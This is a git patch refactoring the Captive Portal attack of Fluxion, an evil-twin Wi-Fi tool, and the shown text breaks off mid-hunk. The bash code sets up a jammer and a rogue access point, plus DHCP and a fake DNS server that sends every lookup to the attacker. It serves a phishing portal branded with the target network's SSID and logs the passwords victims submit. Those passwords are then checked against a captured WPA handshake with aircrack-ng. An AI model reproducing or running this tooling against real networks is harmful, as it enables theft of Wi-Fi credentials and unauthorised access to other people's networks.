From 065bec6b0f09a5c62c827770cf9696c7b500d40a Mon Sep 17 00:00:00 2001
From: Matias Barcenas <MPX.4132@Gmail.com>
Date: Wed, 17 Jan 2018 15:29:05 -0600
Subject: [PATCH] Started upgrading the Captive Portal attack.

Rewrote sections of the script to follow the coding style guide closer.
Implemented and adapted attack requirements for Fluxion v4.
Implemented the script loop using the sequencing framework.
Updated usage of old services to new, including global identifiers.
Implemented and added command line interface flag control.
Some refactoring & removing outdated code.
---
 attacks/Captive Portal/attack.sh      | 757 ++++++++++++++------------
 attacks/Captive Portal/language/en.sh |   2 +
 language/en.sh                        |   6 +-
 3 files changed, 425 insertions(+), 340 deletions(-)

diff --git a/attacks/Captive Portal/attack.sh b/attacks/Captive Portal/attack.sh
index 1f31b2f..c792ec9 100755
--- a/attacks/Captive Portal/attack.sh	
+++ b/attacks/Captive Portal/attack.sh	
@@ -1,221 +1,211 @@
 #!/bin/bash
 
-############################# < Captive Portal Parameters > ############################
+# ============================================================ #
+# =============== < Captive Portal Parameters > ============== #
+# ============================================================ #
 CaptivePortalState="Not Ready"
 
 CaptivePortalPassLog="$FLUXIONPath/attacks/Captive Portal/pwdlog"
 CaptivePortalNetLog="$FLUXIONPath/attacks/Captive Portal/netlog"
-CaptivePortalJamTime="9999999999999"
 
-CaptivePortalAuthenticationMethods=("hash")                                          # "wpa_supplicant")
-CaptivePortalAuthenticationMethodsInfo=("(handshake file, ${CGrn}recommended$CClr)") # "(Target AP authentication, slow)")
+CaptivePortalAuthenticationMethods=("hash") # "wpa_supplicant")
+CaptivePortalAuthenticationMethodsInfo=(
+  "(handshake file, ${CGrn}recommended$CClr)"
+) # "(Target AP authentication, slow)")
 
-########################### < Virtual Network Configuration > ##########################
-# To avoid collapsing with an already connected network, we'll use an uncommon network.
-VIGWAddress="192.168.254.1"
-VIGWNetwork=${VIGWAddress%.*}
+# ============= < Virtual Network Configuration > ============ #
+# To avoid collapsing with an already existing network,
+# we'll use a somewhat uncommon network and server IP.
+CaptivePortalVIGWAddress="192.168.254.1"
+CaptivePortalVIGWNetwork=${CaptivePortalVIGWAddress%.*}
 
-function captive_portal_run_interface() {
-  if [ ! "$1" ]; then return 1; fi
 
-  # Create an identifier for the access point, AP virtual interface.
-  local wiAccessPoint="FX${1:2}AP"
+# ============================================================ #
+# ============== < Captive Portal Subroutines > ============== #
+# ============================================================ #
+captive_portal_unset_jammer_interface() {
+  if [ ! "$CaptivePortalJammerInterface" ]; then return 1; fi
+  CaptivePortalJammerInterface=""
 
-  # Find interface's physical device.
-  if ! interface_physical "$1"; then
-    echo -e "$FLUXIONVLine $FLUXIONPhysicalWIDeviceUnknownError"
-    sleep 5
+  # Check if we're automatically selecting the interface & skip
+  # this one if so to take the user back properly.
+  local interfacesAvailable
+  readarray -t interfacesAvailable < <(attack_targetting_interfaces)
+
+  if [ ${#interfacesAvailable[@]} -le 1 ]; then return 2; fi
+}
+
+captive_portal_set_jammer_interface() {
+  if [ "$CaptivePortalJammerInterface" ]; then return 0; fi
+
+  echo "Running get jammer interface." > $FLUXIONOutputDevice
+  if ! fluxion_get_interface attack_targetting_interfaces \
+    "$CaptivePortalJammerInterfaceQuery"; then
+    echo "Failed to get jammer interface" > $FLUXIONOutputDevice
     return 1
   fi
 
-  local wiAccessPointDevice="$InterfacePhysical"
-
-  # Create the new virtual interface with the generated identifier.
-  echo -e "$FLUXIONVLine $CaptivePortalStartingInterfaceNotice"
-  if ! iw phy $wiAccessPointDevice interface add $wiAccessPoint type monitor 2>$FLUXIONOutputDevice; then
-    echo -e "$FLUXIONVLine $CaptivePortalCannotStartInterfaceError"
-    sleep 5
-    return 3
-  fi
-
-  echo -e "$FLUXIONVLine $CaptivePortalStartedInterfaceNotice"
-  sleep 3
-
-  CaptivePortalRunInterface="$wiAccessPoint"
+  echo "Succeeded get jammer interface." > $FLUXIONOutputDevice
+  CaptivePortalJammerInterface=${FluxionInterfaces[$FluxionInterfaceSelected]}
 }
 
-function captive_portal_unset_interface() {
-  if [ ! "$WIAccessPoint" ]; then return 1; fi
-
-  if interface_is_wireless "$WIAccessPoint"; then fluxion_unset_ap_service
-  fi
-
-  if [ "$WIAccessPoint" = "FX${WIMonitor:2}AP" ]; then
-    # Remove any previously created fluxion AP interfaces.
-    iw dev "$WIAccessPoint" del &>$FLUXIONOutputDevice
-  fi
-
-  WIAccessPoint=""
+captive_portal_ap_interfaces() {
+  interface_list_all
+  local interface
+  for interface in "${InterfaceListAll[@]}"; do
+    if [ "$interface" = "lo" ]; then continue; fi
+    echo "$interface"
+  done
 }
 
-function captive_portal_set_interface() {
-  if [ "$WIAccessPoint" ]; then return 0; fi
+captive_portal_unset_ap_interface() {
+  if [ ! "$CaptivePortalAPInterface" ]; then return 1; fi
+  CaptivePortalAPInterface=""
+}
 
-  captive_portal_unset_interface
+captive_portal_set_ap_interface() {
+  if [ "$CaptivePortalAPInterface" ]; then return 0; fi
 
-  # Gather candidate interfaces.
-  echo -e "$FLUXIONVLine $FLUXIONFindingWINotice"
-
-  # List of all valid network interfaces.
-  interface_list_real
-
-  local ifAlternate=("$FLUXIONGeneralRepeatOption" "$FLUXIONGeneralBackOption")
-  local ifAlternateInfo=("" "")
-  local ifAlternateState=("" "")
-  local ifAlternateColor=("$CClr" "$CClr")
-
-  interface_prompt "$FLUXIONVLine $CaptivePortalInterfaceQuery" InterfaceListReal[@] \
-    ifAlternate[@] ifAlternateInfo[@] ifAlternateState[@] ifAlternateColor[@]
-
-  case "$InterfacePromptIfSelected" in
-  "$FLUXIONGeneralBackOption")
-    captive_portal_unset_interface
+  echo "Running get ap interface." > $FLUXIONOutputDevice
+  if ! fluxion_get_interface captive_portal_ap_interfaces \
+    "$CaptivePortalAPInterfaceQuery"; then
+    echo "Failed to get ap interface" > $FLUXIONOutputDevice
     return 1
-    ;;
-
-  # If the monitor interface is also the AP interface,
-  # there's no need to reserve it again, just add it.
-  "$WIMonitor")
-    if ! captive_portal_run_interface "$InterfacePromptIfSelected"; then return 1
-    fi
-
-    WIAccessPoint="$CaptivePortalRunInterface"
-    ;;
-  *)
-    # We'll only attempt to run wireless interfaces for now.
-    # The conditional below is a temporary fix for ethernet interfaces.
-    # TODO: Fix fluxion_run_interface to accept non-wireless interfaces.
-    if interface_is_wireless "$InterfacePromptIfSelected"; then
-      if ! fluxion_run_interface "$InterfacePromptIfSelected"; then return 2
-      fi
-
-      WIAccessPoint="$FluxionRunInterface"
-    else
-      WIAccessPoint="$InterfacePromptIfSelected"
-    fi
-    ;;
-  esac
-
-  VIGW=$WIAccessPoint
-  VIAP=$WIAccessPoint
-
-  # Set an AP service if the interface selected is wireless.
-  if interface_is_wireless "$WIAccessPoint"; then
-    if ! fluxion_set_ap_service; then
-      captive_portal_unset_interface
-      return 1
-    fi
   fi
+
+  echo "Succeeded get ap interface." > $FLUXIONOutputDevice
+  CaptivePortalAPInterface=${FluxionInterfaces[$FluxionInterfaceSelected]}
 }
 
-function captive_portal_unset_auth() {
-  if [ ! "$APRogueAuthMode" ]; then return 0; fi
+captive_portal_unset_authenticator() {
+  if [ ! "$CaptivePortalAuthenticatorMode" ]; then return 0; fi
 
-  case "$APRogueAuthMode" in
-  "hash") fluxion_unset_hash ;;
+  case "$CaptivePortalAuthenticatorMode" in
+    "hash") fluxion_unset_hash ;;
   esac
 
-  APRogueAuthMode=""
+  CaptivePortalAuthenticatorMode=""
 
   # If we've only got one option, then the user skipped this section
   # by auto-selecting that single option, so we unset the previous
   # phase along with this one to properly take the user back.
   if [ ${#CaptivePortalAuthenticationMethods[@]} -le 1 ]; then
-    captive_portal_unset_interface
+    return 1 # Trigger undo chain because it was auto-selected.
   fi
 }
 
-function captive_portal_set_auth() {
-  if [ "$APRogueAuthMode" ]; then
-    echo "Captive Portal authentication mode is already set, skipping!" >$FLUXIONOutputDevice
+captive_portal_set_authenticator() {
+  if [ "$CaptivePortalAuthenticatorMode" ]; then
+    echo "Captive Portal authentication mode is already set, skipping!" \
+      > $FLUXIONOutputDevice
     return 0
   fi
 
-  captive_portal_unset_auth
+  captive_portal_unset_authenticator
 
   # If we've got only one choice, auto-select it for the user.
-  if [ ${#CaptivePortalAuthenticationMethods[@]} -eq 1 -o \
-    ${#CaptivePortalAuthenticationMethods[@]} -ge 1 -a "$FLUXIONAuto" ]; then
-    APRogueAuthMode="${CaptivePortalAuthenticationMethods[0]}"
-    echo "Auto-selected authentication method: $APRogueAuthMode" >$FLUXIONOutputDevice
+  if [ \
+    ${#CaptivePortalAuthenticationMethods[@]} -eq 1 -o \
+    ${#CaptivePortalAuthenticationMethods[@]} -ge 1 -a \
+    "$FLUXIONAuto" ]; then
+    CaptivePortalAuthenticatorMode="${CaptivePortalAuthenticationMethods[0]}"
+    echo "Auto-selected auth-method: $CaptivePortalAuthenticatorMode" \
+      > $FLUXIONOutputDevice
   else
     fluxion_header
 
     echo -e "$FLUXIONVLine $CaptivePortalVerificationMethodQuery"
     echo
 
-    fluxion_show_ap_info "$APTargetSSID" "$APTargetEncryption" "$APTargetChannel" "$APTargetMAC" "$APTargetMaker"
+    fluxion_target_show "$FluxionTargetSSID" "$FluxionTargetEncryption" \
+      "$FluxionTargetChannel" "$FluxionTargetMAC" "$FluxionTargetMaker"
 
-    local choices=("${CaptivePortalAuthenticationMethods[@]}" "$FLUXIONGeneralBackOption")
-    io_query_format_fields "" "\t$CRed[$CYel%d$CRed]$CClr %b %b\n" choices[@] \
-      CaptivePortalAuthenticationMethodsInfo[@]
+    local choices=(
+      "${CaptivePortalAuthenticationMethods[@]}"
+      "$FLUXIONGeneralBackOption"
+    )
+    io_query_format_fields "" "\t$CRed[$CYel%d$CRed]$CClr %b %b\n" \
+      choices[@] CaptivePortalAuthenticationMethodsInfo[@]
 
     echo
 
-    APRogueAuthMode="${IOQueryFormatFields[0]}"
+    CaptivePortalAuthenticatorMode="${IOQueryFormatFields[0]}"
 
     # If we're going back, reset everything and abort.
-    if [[ "$APRogueAuthMode" == "$FLUXIONGeneralBackOption" ]]; then
-      captive_portal_unset_auth
-      return 1
+    if [[ \
+      "$CaptivePortalAuthenticatorMode" == \
+      "$FLUXIONGeneralBackOption" ]]; then
+      captive_portal_unset_authenticator
+      return -1
     fi
   fi
 
   # Process the authentication method selected.
-  captive_portal_set_auth_processingResult=1 # Assume failure.
-  case "$APRogueAuthMode" in
-  "hash")
-    fluxion_set_hash
-    captive_portal_set_auth_processingResult=$?
-    ;;
+  local result=1 # Assume failure at first.
+  case "$CaptivePortalAuthenticatorMode" in
+    "hash")
+      # Pass default path if no path is set yet.
+      if [ ! "$CaptivePortalHashPath" ]; then
+        CaptivePortalHashPath="$FLUXIONPath/attacks/Handshake Snooper/handshakes/$FluxionTargetSSIDClean-$FluxionTargetMAC.cap"
+      fi
+
+      fluxion_hash_get_path \
+        "$CaptivePortalHashPath" "$FluxionTargetMAC" "$FluxionTargetSSID"
+      result=$?
+
+      if [ $result -eq 0 ]; then
+        CaptivePortalHashPath="$FluxionHashPath"
+      fi
+      ;;
   esac
 
-  # Assure authentication method processing was successful, abort otherwise.
-  if [[ $captive_portal_set_auth_processingResult -ne 0 ]]; then
-    captive_portal_unset_auth
+  # Assure authentication method processing succeeded, abort otherwise.
+  if [[ $result -ne 0 ]]; then
+    echo "Auth-mode error code $result!" > $FLUXIONOutputPath
     return 1
   fi
 }
 
-function captive_portal_run_certificate_generator() {
-  xterm -bg "#000000" -fg "#CCCCCC" -title "Generating Self-Signed SSL Certificate" -e openssl req -subj '/CN=captive.router.lan/O=CaptivePortal/OU=Networking/C=US' -new -newkey rsa:2048 -days 365 -nodes -x509 -keyout "$FLUXIONWorkspacePath/server.pem" -out "$FLUXIONWorkspacePath/server.pem" # more details there https://www.openssl.org/docs/manmaster/apps/openssl.html
+captive_portal_run_certificate_generator() {
+  xterm -bg "#000000" -fg "#CCCCCC" \
+    -title "Generating Self-Signed SSL Certificate" -e openssl req \
+    -subj '/CN=captive.router.lan/O=CaptivePortal/OU=Networking/C=US' \
+    -new -newkey rsa:2048 -days 365 -nodes -x509 \
+    -keyout "$FLUXIONWorkspacePath/server.pem" \
+    -out "$FLUXIONWorkspacePath/server.pem"
+    # Details -> https://www.openssl.org/docs/manmaster/apps/openssl.html
   chmod 400 "$FLUXIONWorkspacePath/server.pem"
 }
 
-function captive_portal_unset_cert() {
+captive_portal_unset_certificate() {
+  if [ ! "$CaptivePortalSSL" ]; then return 1; fi
   sandbox_remove_workfile "$FLUXIONWorkspacePath/server.pem"
   CaptivePortalSSL=""
 }
 
 # Create Self-Signed SSL Certificate
-function captive_portal_set_cert() {
+captive_portal_set_certificate() {
   if [ "$CaptivePortalSSL" ]; then
-    echo "Captive Portal SSL mode already set to $CaptivePortalSSL!" >$FLUXIONOutputDevice
+    echo "Captive Portal SSL mode already set to $CaptivePortalSSL!" \
+      > $FLUXIONOutputDevice
     return 0
   fi
 
-  captive_portal_unset_cert
+  captive_portal_unset_certificate
 
-  # Check for existance of ssl certificate within fluxion with file size > 0
-  # If a certificate exists, it's user supplied (fancy), copy it to fluxspace.
-  if [ -f "$FLUXIONPath/attacks/Captive Portal/certificate/server.pem" -a \
-    -s "$FLUXIONPath/attacks/Captive Portal/certificate/server.pem" ]; then
+  # Check existance of ssl certificate within fluxion with file size > 0
+  # If user-supplied (fancy) certificate exists, copy it to fluxspace.
+  if [ \
+    -f "$FLUXIONPath/attacks/Captive Portal/certificate/server.pem" -a \
+    -s "$FLUXIONPath/attacks/Captive Portal/certificate/server.pem" \
+    ]; then
     cp "$FLUXIONPath/attacks/Captive Portal/certificate/server.pem" \
       "$FLUXIONWorkspacePath/server.pem"
 
     CaptivePortalSSL="enabled" # Must be enabled if sourcing own certificate
 
-    echo "Captive Portal certificate was user supplied, skipping query!" >$FLUXIONOutputDevice
+    echo "Captive Portal certificate was user supplied, skipping query!" \
+      > $FLUXIONOutputDevice
     return 0
   fi
 
@@ -227,81 +217,90 @@ function captive_portal_set_cert() {
     fi
     CaptivePortalSSL="enabled"
   else
-    local choices=("$CaptivePortalCertificateSourceGenerateOption" "$CaptivePortalCertificateSourceRescanOption" "$CaptivePortalCertificateSourceDisabledOption" "$FLUXIONGeneralBackOption")
+    local choices=(
+      "$CaptivePortalCertificateSourceGenerateOption"
+      "$CaptivePortalCertificateSourceRescanOption"
+      "$CaptivePortalCertificateSourceDisabledOption"
+      "$FLUXIONGeneralBackOption"
+    )
 
     io_query_choice "$CaptivePortalCertificateSourceQuery" choices[@]
 
     echo
 
     case "$IOQueryChoice" in
-    "$CaptivePortalCertificateSourceGenerateOption")
-      # If cert generator fails, gtfo, something broke!
-      if ! captive_portal_run_certificate_generator; then
-        fluxion_conditional_bail "cert-gen failed!"
+      "$CaptivePortalCertificateSourceGenerateOption")
+        # If cert generator fails, gtfo, something broke!
+        if ! captive_portal_run_certificate_generator; then
+          fluxion_conditional_bail "cert-gen failed!"
+          return 2
+        fi
+        CaptivePortalSSL="enabled"
+        ;;
+
+      "$CaptivePortalCertificateSourceRescanOption")
+        captive_portal_set_certificate
+        return $?
+        ;;
+
+      "$CaptivePortalCertificateSourceDisabledOption")
+        CaptivePortalSSL="disabled"
+        ;;
+
+      "$FLUXIONGeneralBackOption")
+        return 1
+        ;;
+      *)
+        fluxion_conditional_bail "Unknown cert-gen option!"
         return 2
-      fi
-      CaptivePortalSSL="enabled"
-      ;;
-
-    "$CaptivePortalCertificateSourceRescanOption")
-      captive_portal_set_cert
-      return $?
-      ;;
-
-    "$CaptivePortalCertificateSourceDisabledOption")
-      captive_portal_unset_cert
-      CaptivePortalSSL="disabled"
-      ;;
-
-    "$FLUXIONGeneralBackOption")
-      captive_portal_unset_cert
-      return 1
-      ;;
-    *)
-      fluxion_conditional_bail "Unknown cert-gen option!"
-      return 2
-      ;;
+        ;;
     esac
   fi
 }
 
-function captive_portal_unset_conn() {
+captive_portal_unset_connectivity() {
+  if [ ! "$CaptivePortalConnectivity" ]; then return 1; fi
   CaptivePortalConnectivity=""
 }
 
-function captive_portal_set_conn() {
+captive_portal_set_connectivity() {
   if [ "$CaptivePortalConnectivity" ]; then return 0; fi
 
-  captive_portal_unset_conn
+  captive_portal_unset_connectivity
 
-  local choices=("$CaptivePortalConnectivityDisconnectedOption" "$CaptivePortalConnectivityEmulatedOption" "$FLUXIONGeneralBackOption")
+  local choices=(
+    "$CaptivePortalConnectivityDisconnectedOption"
+    "$CaptivePortalConnectivityEmulatedOption"
+    "$FLUXIONGeneralBackOption"
+  )
   io_query_choice "$CaptivePortalConnectivityQuery" choices[@]
 
   case "$IOQueryChoice" in
-  "$CaptivePortalConnectivityDisconnectedOption") CaptivePortalConnectivity="disconnected" ;;
-  "$CaptivePortalConnectivityEmulatedOption") CaptivePortalConnectivity="emulated" ;;
-  "$FLUXIONGeneralBackOption")
-    captive_portal_unset_conn
-    return 1
-    ;;
-  *)
-    fluxion_conditional_bail "Unknown connectivity option!"
-    return 2
-    ;;
+    "$CaptivePortalConnectivityDisconnectedOption")
+      CaptivePortalConnectivity="disconnected" ;;
+    "$CaptivePortalConnectivityEmulatedOption")
+      CaptivePortalConnectivity="emulated" ;;
+    "$FLUXIONGeneralBackOption")
+      return 1
+      ;;
+    *)
+      fluxion_conditional_bail "Unknown connectivity option!"
+      return 2
+      ;;
   esac
 }
 
-function captive_portal_unset_site() {
-  sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal"
+captive_portal_unset_user_interface() {
+  if [ -z "$CaptivePortalUserInterface" -o \
+    ! -d "$FLUXIONPath/attacks/Captive Portal/sites/$CaptivePortalUserInterface.portal" ]; then return 1; fi
+  CaptivePortalUserInterface=""
 }
 
-function captive_portal_set_site() {
-  if [ -d "$FLUXIONWorkspacePath/captive_portal" ]; then
-    echo "Captive Portal site (interface) is already set, skipping!" >$FLUXIONOutputDevice
-    return 0
-  fi
+captive_portal_set_user_interface() {
+  if [ "$CaptivePortalUserInterface" != "" -a \
+    -d "$FLUXIONPath/attacks/Captive Portal/sites/$CaptivePortalUserInterface.portal" ]; then return 0; fi
 
-  captive_portal_unset_site
+  captive_portal_unset_portal
 
   local sites=()
 
@@ -334,7 +333,8 @@ function captive_portal_set_site() {
 
   echo
 
-  fluxion_show_ap_info "$APTargetSSID" "$APTargetEncryption" "$APTargetChannel" "$APTargetMAC" "$APTargetMaker"
+  fluxion_target_show "$FluxionTargetSSID" "$FluxionTargetEncryption" \
+    "$FluxionTargetChannel" "$FluxionTargetMAC" "$FluxionTargetMaker"
 
   io_query_format_fields "" "$queryFieldOptionsFormat\n" \
     sitesIdentifier[@] sitesLanguage[@]
@@ -346,39 +346,27 @@ function captive_portal_set_site() {
   local sitePath="${site}_${siteLanguage}"
 
   case "$site" in
-  "$CaptivePortalGenericInterfaceOption")
-    source "$FLUXIONPath/attacks/Captive Portal/generic/languages/$siteLanguage.lang"
-    captive_portal_generic
-    ;;
-  "$FLUXIONGeneralBackOption")
-    captive_portal_unset_site
-    return 1
-    ;;
-  *)
-    cp -r "$FLUXIONPath/attacks/Captive Portal/sites/$sitePath.portal" \
-      "$FLUXIONWorkspacePath/captive_portal"
-
-    find "$FLUXIONWorkspacePath/captive_portal/" -type f -exec sed -i -e 's/$APTargetSSID/'"${APTargetSSID//\//\\\/}"'/g; s/$APTargetMAC/'"${APTargetMAC//\//\\\/}"'/g; s/$APTargetChannel/'"${APTargetChannel//\//\\\/}"'/g' {} \;
-    ;;
+    "$CaptivePortalGenericInterfaceOption")
+      source "$FLUXIONPath/attacks/Captive Portal/generic/languages/$siteLanguage.lang"
+      captive_portal_generic
+      ;;
+    "$FLUXIONGeneralBackOption")
+      captive_portal_unset_portal
+      return 1
+      ;;
+    *)
+      CaptivePortalUserInterface=$sitePath
+      ;;
   esac
 }
 
-function captive_portal_unset_attack() {
-  sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
-  sandbox_remove_workfile "$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py"
-  sandbox_remove_workfile "$FLUXIONWorkspacePath/lighttpd.conf"
-  sandbox_remove_workfile "$FLUXIONWorkspacePath/dhcpd.leases"
-  sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal/check.php"
-  sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal"
 
-  # Only reset the AP if one has been defined.
-  if [ "$APRogueService" -a "$(type -t ap_reset)" ]; then ap_reset
-  fi
-}
-
-function captive_portal_get_client_IP() {
-  if [ -f "$CaptivePortalPassLog/$APTargetSSIDClean-$APTargetMAC-IP.log" ]; then
-    MatchedClientIP=$(cat "$CaptivePortalPassLog/$APTargetSSIDClean-$APTargetMAC-IP.log" | sed '/^\s*$/d' | tail -n 1 | head -n 1)
+captive_portal_get_client_IP() {
+  if [ -f "$CaptivePortalPassLog/$FluxionTargetSSIDClean-$FluxionTargetMAC-IP.log" ]; then
+    MatchedClientIP=$(
+      cat "$CaptivePortalPassLog/$FluxionTargetSSIDClean-$FluxionTargetMAC-IP.log" | \
+        sed '/^\s*$/d' | tail -n 1 | head -n 1
+    )
   else
     MatchedClientIP="unknown"
   fi
@@ -386,38 +374,66 @@ function captive_portal_get_client_IP() {
   echo $MatchedClientIP
 }
 
-function captive_portal_get_IP_MAC() {
-  if [ -f "$CaptivePortalPassLog/$APTargetSSIDClean-$APTargetMAC-IP.log" ] && [ "$(captive_portal_get_client_IP)" != "" ] && [ -f "$FLUXIONWorkspacePath/clients.txt" ]; then
-    IP=$(captive_portal_get_client_IP)
-    MatchedClientMAC=$(cat $FLUXIONWorkspacePath/clients.txt | grep $IP | awk '{print $5}' | grep : | head -n 1 | tr [:upper:] [:lower:])
+captive_portal_get_IP_MAC() {
+  if [ -f "$CaptivePortalPassLog/$FluxionTargetSSIDClean-$FluxionTargetMAC-IP.log" ] && \
+    [ "$(captive_portal_get_client_IP)" != "" ] && \
+    [ -f "$FLUXIONWorkspacePath/clients.txt" ]; then
+    local IP=$(captive_portal_get_client_IP)
+    local MatchedClientMAC=$(
+      cat $FLUXIONWorkspacePath/clients.txt | \
+        grep $IP | awk '{print $5}' | grep : | head -n 1 | \
+        tr [:upper:] [:lower:]
+    )
     if [ "$(echo $MatchedClientMAC | wc -m)" != "18" ]; then
-      MatchedClientMAC="xx:xx:xx:xx:xx:xx"
+      local MatchedClientMAC="xx:xx:xx:xx:xx:xx"
     fi
   else
-    MatchedClientMAC="unknown"
+    local MatchedClientMAC="unknown"
   fi
   echo $MatchedClientMAC
 }
 
-function captive_portal_get_MAC_brand() {
-  local MACManufacturer=""
+captive_portal_get_MAC_brand() {
   if [ $(captive_portal_get_IP_MAC) != "" ]; then
-    MACManufacturer=$(macchanger -l | grep "$(echo "$(captive_portal_get_IP_MAC)" | cut -d ":" -f -3)" | cut -d " " -f 5-)
+    local MACManufacturer=$( macchanger -l | \
+      grep "$(echo "$(captive_portal_get_IP_MAC)" | cut -d ":" -f -3)" | \
+      cut -d " " -f 5-)
     if echo "$MACManufacturer" | grep -q x; then
-      MACManufacturer="unknown"
+      local MACManufacturer="unknown"
     fi
   else
-    MACManufacturer="unknown"
+    local MACManufacturer="unknown"
   fi
 
   echo $MACManufacturer
 }
 
-# Create different settings required for the script
-function captive_portal_set_attack() {
-  # AP Service: Prepare service for an attack.
-  if [ "$APRogueService" ]; then ap_prep
+
+captive_portal_unset_attack() {
+  sandbox_remove_workfile \
+    "$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
+  sandbox_remove_workfile \
+    "$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py"
+  sandbox_remove_workfile "$FLUXIONWorkspacePath/lighttpd.conf"
+  sandbox_remove_workfile "$FLUXIONWorkspacePath/dhcpd.leases"
+  sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal/check.php"
+  sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal"
+
+  # Only reset the AP if one has been defined.
+  if [ "$APRogueService" -a "$(type -t ap_reset)" ]; then
+    ap_reset
   fi
+}
+
+# Create different settings required for the script
+captive_portal_set_attack() {
+  # Load and set the captive portal user interface.
+  cp -r "$FLUXIONPath/attacks/Captive Portal/sites/$CaptivePortalUserInterface.portal" \
+        "$FLUXIONWorkspacePath/captive_portal"
+
+  find "$FLUXIONWorkspacePath/captive_portal/" -type f -exec \
+    sed -i -e 's/$APTargetSSID/'"${FluxionTargetSSID//\//\\\/}"'/g; s/$APTargetMAC/'"${FluxionTargetMAC//\//\\\/}"'/g; s/$APTargetChannel/'"${FluxionTargetChannel//\//\\\/}"'/g' {} \;
+
 
   # Add the PHP authenticator scripts, used to verify
   # password attempts from users using the web interface.
@@ -435,6 +451,13 @@ function captive_portal_set_attack() {
   cp -r "$FLUXIONPath/attacks/Captive Portal/lib/connectivity responses/" \
     "$FLUXIONWorkspacePath/captive_portal/connectivity_responses"
 
+
+  # AP Service: Prepare service for an attack.
+  if [ "$APRogueService" ]; then
+    ap_prep
+  fi
+
+
   # Generate the dhcpd configuration file, which is
   # used to provide DHCP service to APRogue clients.
   echo "\
@@ -443,13 +466,13 @@ authoritative;
 default-lease-time 600;
 max-lease-time 7200;
 
-subnet $VIGWNetwork.0 netmask 255.255.255.0 {
-	option broadcast-address $VIGWNetwork.255;
-	option routers $VIGWAddress;
+subnet $CaptivePortalVIGWNetwork.0 netmask 255.255.255.0 {
+	option broadcast-address $CaptivePortalVIGWNetwork.255;
+	option routers $CaptivePortalVIGWAddress;
 	option subnet-mask 255.255.255.0;
-	option domain-name-servers $VIGWAddress;
+	option domain-name-servers $CaptivePortalVIGWAddress;
 
-	range $VIGWNetwork.100 $VIGWNetwork.254;
+	range $CaptivePortalVIGWNetwork.100 $CaptivePortalVIGWNetwork.254;
 }\
 " >"$FLUXIONWorkspacePath/dhcpd.conf"
 
@@ -579,7 +602,7 @@ class DNSQuery:
     return packet
 
 if __name__ == '__main__':
-  ip='$VIGWAddress'
+  ip='$CaptivePortalVIGWAddress'
   print 'pyminifakeDwebconfNS:: dom.query. 60 IN A %s' % ip
 
   udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
@@ -598,16 +621,17 @@ if __name__ == '__main__':
 
   chmod +x "$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py"
 
+  local -r targetSSIDCleanNormalized=${FluxionTargetSSIDClean//"/\\"}
   # Attack arbiter script
   echo "\
 #!/bin/bash
 
-function signal_stop_attack() {
+signal_stop_attack() {
 	kill -s SIGABRT $$ # Signal STOP ATTACK
 	handle_abort_authenticator
 }
 
-function handle_abort_authenticator() {
+handle_abort_authenticator() {
 	AuthenticatorState=\"aborted\"
 }
 
@@ -670,25 +694,25 @@ while [ \$AuthenticatorState = \"running\" ]; do
 
 	if [ -f \"$FLUXIONWorkspacePath/pwdattempt.txt\" -a -s \"$FLUXIONWorkspacePath/pwdattempt.txt\" ]; then
 		# Save any new password attempt.
-		cat \"$FLUXIONWorkspacePath/pwdattempt.txt\" >> \"$CaptivePortalPassLog/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC.log\"
+		cat \"$FLUXIONWorkspacePath/pwdattempt.txt\" >> \"$CaptivePortalPassLog/$targetSSIDCleanNormalized-$FluxionTargetMAC.log\"
 
 		# Clear logged password attempt.
 		echo -n > \"$FLUXIONWorkspacePath/pwdattempt.txt\"
 	fi
 
 	if [ -f \"$FLUXIONWorkspacePath/ip_hits\" -a -s \"$FLUXIONWorkspacePath/ip_hits.txt\" ]; then
-		cat \"$FLUXIONWorkspacePath/ip_hits\" >> \"$CaptivePortalPassLog/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC-IP.log\"
-		echo \" \" >> \"$CaptivePortalPassLog/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC-IP.log\"
+		cat \"$FLUXIONWorkspacePath/ip_hits\" >> \"$CaptivePortalPassLog/$targetSSIDCleanNormalized-$FluxionTargetMAC-IP.log\"
+		echo \" \" >> \"$CaptivePortalPassLog/$targetSSIDCleanNormalized-$FluxionTargetMAC-IP.log\"
 		echo -n > \"$FLUXIONWorkspacePath/ip_hits\"
 	fi
 
 " >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
 
-  if [ $APRogueAuthMode = "hash" ]; then
+  if [ $CaptivePortalAuthenticatorMode = "hash" ]; then
     echo "
 	if [ -f \"$FLUXIONWorkspacePath/candidate_result.txt\" ]; then
 		# Check if we've got the correct password by looking for anything other than \"Passphrase not in\".
-		if ! aircrack-ng -w \"$FLUXIONWorkspacePath/candidate.txt\" \"$FLUXIONWorkspacePath/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC.cap\" | grep -qi \"Passphrase not in\"; then
+		if ! aircrack-ng -w \"$FLUXIONWorkspacePath/candidate.txt\" \"$CaptivePortalHashPath\" | grep -qi \"Passphrase not in\"; then
             echo \"2\" > \"$FLUXIONWorkspacePath/candidate_result.txt\"
 
 			sleep 1
@@ -701,16 +725,16 @@ while [ \$AuthenticatorState = \"running\" ]; do
 	fi" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
   fi
 
-  local staticSSID=$(printf "%q" "$APTargetSSID" | sed -r 's/\\\ / /g' | sed -r "s/\\\'/\'/g")
+  local -r staticSSID=$(printf "%q" "$FluxionTargetSSID" | sed -r 's/\\\ / /g' | sed -r "s/\\\'/\'/g")
   echo "
-	DHCPClients=($(nmap -PR -sn -n -oG - $VIGWNetwork.100-110 2>&1 | grep Host))
+	DHCPClients=($(nmap -PR -sn -n -oG - $CaptivePortalVIGWNetwork.100-110 2>&1 | grep Host))
 
 	echo
 	echo -e \"  ACCESS POINT:\"
 	printf  \"    SSID ...........: $CWht%s$CClr\\n\" \"$staticSSID\"
-	echo -e \"    MAC ............: $CYel$APTargetMAC$CClr\"
